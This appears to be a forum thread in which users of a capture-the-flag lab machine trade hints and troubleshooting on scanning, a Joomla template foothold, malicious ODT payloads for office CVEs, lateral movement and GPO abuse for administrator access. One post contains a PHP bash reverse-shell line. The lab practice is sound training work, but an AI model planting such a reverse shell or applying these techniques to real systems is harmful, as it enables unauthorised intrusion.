i got to admin privileges, but the code in file in administrator\desktop\root.txt isnt’ accepted by the htb site. reset machine twice (reboots the box, but apparently doesn’t wipe out data from it), but no luck. What could be wrong?
Is it me or the box but most of the time it is completly dead or ping is between 30ms and 1000ms. A reset worked only for a while and switching vpn/server didn’t really help.
I’m stuck on lateral movement … t*** to h*** via re* ed***
I’m having the same issue as pyfffe, i tried switching vpn’s but same issue still. Did you manage to figure it out?
I’m stuck port 80 no response. Nmap show is filtered. Can’t access Joomla. Should it be like that? Or HTB Box is not working.
└─$ nmap -sC -sV -T4 -Pn -p 80 office.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 19:21 GMT
Nmap scan report for office.htb (
Host is up.
rDNS record for OFFICE.HTB
80/tcp filtered http
I am having a hard time trying to get a reverse shell it’s been 2 hours already!
I tried to modified template index.php and save but nothing happened!!
added / system(“/bin/bash -c ‘bash -i >& /dev/tcp/ 0>&1’”);
Has anyone targeted the office product installed on this machine and had success? It seems like it /should/ be vulnerable to CVE-2023-2255 and/or CVE-2019-9848. I can get a connect back using the msf module for the office product, but it closes no matter what paramters/configurations I use. Any guidance on how others got this to work? Or am I too far down the wrong foxhole? I already have the initial foothold and got the user.txt, now just trying to PE and get the root.txt.
I have uploaded odt payload but which port i should be listening to get another shell ?!
I am currently on the box as user ppotts, I feel like I have checked almost everything for a pivot to hhogan or to admin privs. I have tried exploiting the mysql service running but since the secure file privs is set I can’t mess with that it seems. I tried messing with the powershell script inside of ppotts home folder with no luck since it is running as her. I have tried looking for creds and services inside of files but no luck. The only weird thing I found that I can’t trace back is inside of the powershell history the download of the job.txt file.
Any hints would be much appreciated.
i have got the hhogan credentials. i am trying to use SharpGPOAbuse to get administrator but it is not working… can you help me on it?
@NeonSamurai and @thesanjaygupta When I tried building it from the solution in the repo I had issues, but when I downloaded a precompiled binary it worked fine.
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